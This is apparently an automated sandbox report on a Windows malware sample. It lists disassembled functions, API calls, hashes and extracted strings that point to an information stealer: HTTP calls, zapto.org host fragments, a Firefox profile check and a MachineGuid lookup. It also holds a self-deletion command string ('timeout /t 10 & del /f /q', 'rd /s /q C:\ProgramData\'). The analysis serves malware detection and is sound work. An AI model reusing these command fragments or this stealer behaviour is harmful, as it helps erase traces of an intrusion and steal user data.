                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                      • String ID: GET
                                      • API String ID: 442264750-1805413626
                                      • Opcode ID: e61985f693ba435fd8e9d5e200cec6940f385f7077ed77c461adddd3ab94b392
                                      • Instruction ID: 1b7e4686df58025699884ef73405ecdb1c4eb4b7d9846a41a315df7359032c49
                                      • Opcode Fuzzy Hash: e61985f693ba435fd8e9d5e200cec6940f385f7077ed77c461adddd3ab94b392
                                      • Instruction Fuzzy Hash: AC517671A1021DABEB20EFA4DD55FBFB7B8EF58740F404128FB05A7281D7709A158BA0
                                      Function 003039E0 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 633sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2331 3039e0-303a72 call 2ff800 * 3 call 2ff8a0 * 3 call 2ff810 * 6 2355 303a77-303a7e call 2f1fa0 2331->2355 2358 303a80-303ae9 call 2f1ee0 call 2ff8f0 call 2ff890 call 2f1f00 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2355->2358 2359 303aee-303b1a call 2f1ee0 call 2f1f40 call 2f1080 call 302fa0 2355->2359 2395 303b97 call 2ff890 2358->2395 2375 303b1f-303b4f call 2ff8f0 call 2ff890 call 2ffa50 StrCmpCA 2359->2375 2389 303b51-303b91 call 2f1f00 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2375->2389 2390 303b9c-303bb2 call 2ffa50 StrCmpCA 2375->2390 2389->2395 2398 3041b8-3041e5 call 2ff8f0 call 2f1f00 call 2ff8f0 call 2ff890 call 2f1fc0 2390->2398 2399 303bb8-303bbf call 2f1fb0 2390->2399 2395->2390 2447 3041ea-304292 call 2ff8f0 call 2ff890 call 2ff850 * 3 call 2ff890 * 13 2398->2447 2409 303ce5-303cfb call 2ffa50 StrCmpCA 2399->2409 2410 303bc5-303bcc call 2f1fa0 2399->2410 2419 303d01-303d08 call 2f1fa0 2409->2419 2420 304184-3041b6 call 2ff8f0 call 2f1f00 call 2ff8f0 call 2ff890 call 2f1fc0 2409->2420 2421 303c37-303c63 call 2f1f20 call 2f1f40 call 2f1080 call 302fa0 2410->2421 2422 303bce-303c32 call 2f1f20 call 2ff8f0 call 2ff890 call 2f1f00 call 2f1f20 call 2f1080 call 302ee0 call 2ff8f0 2410->2422 2436 303e2e-303e44 call 2ffa50 StrCmpCA 2419->2436 2437 303d0e-303d15 call 2f1fa0 2419->2437 2420->2447 2474 303c68-303c98 call 2ff8f0 call 2ff890 call 2ffa50 StrCmpCA 2421->2474 2560 303ce0 call 2ff890 2422->2560 2454 304150-304182 call 2ff8f0 call 2f1f60 call 2ff8f0 call 2ff890 call 2f1fe0 2436->2454 2455 303e4a-303e51 call 2f1fa0 2436->2455 2456 303d80-303de1 call 2f1f60 call 2f1f80 call 2f1080 call 302fa0 call 2ff8f0 call 2ff890 call 2ffa50 StrCmpCA 2437->2456 2457 303d17-303d7b call 2f1f60 call 2ff8f0 call 2ff890 call 2f1f60 * 2 call 2f1080 call 302ee0 call 2ff8f0 2437->2457 2454->2447 2479 303f77-303f8d call 2ffa50 StrCmpCA 2455->2479 2480 303e57-303e5e call 2f1fa0 2455->2480 2456->2436 2604 303de3-303e23 call 2f1f60 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2456->2604 2620 303e29 call 2ff890 2457->2620 2474->2409 2541 303c9a-303cda call 2f1f00 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2474->2541 2506 303f93-303f9a call 2f1fa0 2479->2506 2507 304119-30414b call 2ff8f0 call 2f1f60 call 2ff8f0 call 2ff890 call 2f1fe0 2479->2507 2508 303e60-303ec4 call 2f1f60 call 2ff8f0 call 2ff890 call 2f1f60 * 2 call 2f1080 call 302ee0 call 2ff8f0 2480->2508 2509 303ec9-303f2a call 2f1f60 call 2f1f80 call 2f1080 call 302fa0 call 2ff8f0 call 2ff890 call 2ffa50 StrCmpCA 2480->2509 2534 303fa0-303fa7 call 2f1fa0 2506->2534 2535 3040ba-3040d0 call 2ffa50 StrCmpCA 2506->2535 2507->2447 2670 303f72 call 2ff890 2508->2670 2509->2479 2656 303f2c-303f6c call 2f1f60 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2509->2656 2566 304012-304073 call 2f1f60 * 2 call 2f1080 call 302fa0 call 2ff8f0 call 2ff890 call 2ffa50 StrCmpCA 2534->2566 2567 303fa9-30400d call 2f1f60 call 2ff8f0 call 2ff890 call 2f1f60 * 2 call 2f1080 call 302ee0 call 2ff8f0 2534->2567 2568 3040e2-304114 call 2ff8f0 call 2f1f60 call 2ff8f0 call 2ff890 call 2f1f60 2535->2568 2569 3040d2-3040dd Sleep 2535->2569 2541->2560 2560->2409 2566->2535 2687 304075-3040b2 call 2f1f60 call 2ff850 call 2f1080 call 302ee0 call 2ff8f0 2566->2687 2694 3040b5 call 2ff890 2567->2694 2568->2447 2569->2355 2604->2620 2620->2436 2656->2670 2670->2479 2687->2694 2694->2535
                                      APIs
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303B47
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303BAA
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303CF3
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00302EE0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00302F20
                                        • Part of subcall function 00302FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00302FFA
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 00303011
                                        • Part of subcall function 00302FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00303039
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 0030304E
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 0030306B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303C90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303DD9
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303E3C
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303F22
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303F85
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0030406B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003040C8
                                      • Sleep.KERNEL32(0000EA60), ref: 003040D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR
                                      • API String ID: 507064821-2861137601
                                      • Opcode ID: 14292f27e43b744dbb791f7b11404459265273f9ffd64b868d817a189ca49996
                                      • Instruction ID: 61fca1fc747113b01ab53e49c9594cab10458315fce5431ba07c365c554710e3
                                      • Opcode Fuzzy Hash: 14292f27e43b744dbb791f7b11404459265273f9ffd64b868d817a189ca49996
                                      • Instruction Fuzzy Hash: C5221C7582020CAADB54FB70DD569FEB73C6F143C0F804578FA0662196EF35AB688E61
                                      Function 00303230 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00303249
                                      • memset.MSVCRT ref: 00303255
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0030326A
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 003033B5
                                      • memset.MSVCRT ref: 003033C2
                                      • memset.MSVCRT ref: 003033D4
                                      • ExitProcess.KERNEL32 ref: 003033E5
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpymemset$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                      • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                      • API String ID: 1134881415-1686486140
                                      • Opcode ID: 41afacafe2a94d042948d268c31d11751adad45ea8ac941f58cedb54d51df49f
                                      • Instruction ID: 784932082eebeaa597e84b468cb884d69002d306bcc6178f159ff7913fbd3afb
                                      • Opcode Fuzzy Hash: 41afacafe2a94d042948d268c31d11751adad45ea8ac941f58cedb54d51df49f
                                      • Instruction Fuzzy Hash: BD510B71C2020CAACB55EBA0DD92DFEB738AF14780F508279F21672191EB706759CF94
                                      Function 00306510 Relevance: 20.5, APIs: 4, Strings: 7, Instructions: 1232networksleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00301400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301439
                                        • Part of subcall function 00301400: Process32First.KERNEL32(00000000,00000128), ref: 00301449
                                        • Part of subcall function 00301400: Process32Next.KERNEL32(00000000,00000128), ref: 0030145B
                                        • Part of subcall function 00301400: StrCmpCA.SHLWAPI(?,?), ref: 00301470
                                        • Part of subcall function 00301400: CloseHandle.KERNEL32(00000000), ref: 00301482
                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,02F45090,00000000,?,003101E9,00000000), ref: 00306A16
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306B22
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306B3C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00300420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                        • Part of subcall function 00300420: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
                                        • Part of subcall function 00300420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                        • Part of subcall function 00300420: RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                        • Part of subcall function 002F3E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F3EAC
                                        • Part of subcall function 002F3E20: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F3EC7
                                        • Part of subcall function 003023F0: StrCmpCA.SHLWAPI(00000000,block), ref: 0030240D
                                        • Part of subcall function 003023F0: ExitProcess.KERNEL32 ref: 00302418
                                        • Part of subcall function 002FE870: StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FE8C0
                                        • Part of subcall function 002FE870: StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FE947
                                        • Part of subcall function 002F5BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5C3C
                                        • Part of subcall function 002F5BB0: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F5C57
                                        • Part of subcall function 00301F00: strtok_s.MSVCRT ref: 00301F24
                                      • Sleep.KERNEL32(000003E8), ref: 00306F45
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F45420), ref: 00305D5B
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,00000000), ref: 00305D7E
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305D9A
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305DAE
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F389E0), ref: 00305DC1
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305DD5
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F45900), ref: 00305DE9
                                        • Part of subcall function 002F45D0: lstrlen.KERNEL32(00000000), ref: 002F4641
                                        • Part of subcall function 002F45D0: StrCmpCA.SHLWAPI(?,02F43058,003101E9,003101E9,003101E9,003101E9), ref: 002F46A6
                                        • Part of subcall function 002F45D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F46CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocateCloseExitFirstHandleInformationNextSleepSnapshotToolhelp32VolumeWindowsstrtok_s
                                      • String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
                                      • API String ID: 1508513256-1018522893
                                      • Opcode ID: d8e5fc7bd8b07a0d85b9583b4f6b1104393b562dc52c32e61e0f1d44f668e690
                                      • Instruction ID: ffb1fba41777ebdb860650578df4d8a17c68084f775e7e44db0c308512b6f259
                                      • Opcode Fuzzy Hash: d8e5fc7bd8b07a0d85b9583b4f6b1104393b562dc52c32e61e0f1d44f668e690
                                      • Instruction Fuzzy Hash: 67A26171D2020CAACB59FBA0DD62DFDF778AF54780F404178E60662291EF306B59CEA5
                                      Function 002FE870 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 375COMMON
                                      Download Yara Rule
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FE8C0
                                      • StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FE947
                                      • StrCmpCA.SHLWAPI(00000000,firefox), ref: 002FECBD
                                      • StrCmpCA.SHLWAPI(00000000,02F43378), ref: 002FEA4C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                      • StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FEB30
                                      • StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FEBB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: Stable\$firefox
                                      • API String ID: 3722407311-3160656979
                                      • Opcode ID: cfa1e1f25d0904b37ba279d90bf688b813adc01a0004ba88862e295c2527eff2
                                      • Instruction ID: 57271a3d6d385cc0fd3f4a0b3830d636b52f7f66977cee28615a0528dda60b26
                                      • Opcode Fuzzy Hash: cfa1e1f25d0904b37ba279d90bf688b813adc01a0004ba88862e295c2527eff2
                                      • Instruction Fuzzy Hash: FCE13371A102089FCB68EF64D956EEDB7B9BF44390F408539ED099B391DB309A18CF91
                                      Function 00300340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00300365
                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00300382
                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 003003A4
                                      • RegCloseKey.ADVAPI32(?), ref: 003003AE
                                      • CharToOemA.USER32(00000000,?), ref: 003003C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
